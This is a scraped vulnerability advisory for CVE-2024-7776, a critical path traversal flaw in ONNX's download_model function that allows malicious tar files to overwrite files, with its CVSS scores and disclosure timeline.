Path Traversal Vulnerability in ONNX Framework Affects File Security
CVE-2024-7776

9.1CRITICAL

Key Information:

Vendor: Onnx
Status: Onnx/onnx
Vendor: CVE Published:; 20 March 2025

What is CVE-2024-7776?

A security weakness exists in the download_model function of the ONNX framework, present in version 1.16.1 and earlier. This vulnerability allows attackers to exploit path traversal deficiencies, enabling the upload of malicious tar files that can overwrite files in a user's directory. This could lead to severe implications, including the potential for remote command execution, thus posing a significant risk to affected systems.

Affected Version(s)

onnx/onnx <= unspecified

References

https://huntr.com/bounties/a7a46cf6-1fa0-454b-988c-62d222...

CVSS V3.1

Score:

9.1

Severity:

CRITICAL

Confidentiality:

None

Integrity:

High

Availability:

None

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

None

User Interaction:

None

Scope:

Unchanged

CVSS V3.0

Score:

8.1

Severity:

HIGH

Confidentiality:

None

Integrity:

High

Availability:

None

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

None

User Interaction:

Required

Scope:

Unchanged

Timeline

Vulnerability published
Mar 20, 2025
Vulnerability Reserved
Aug 13, 2024

Onnx

What is CVE-2024-7776?

Affected Version(s)

References

CVSS V3.1

CVSS V3.0

Timeline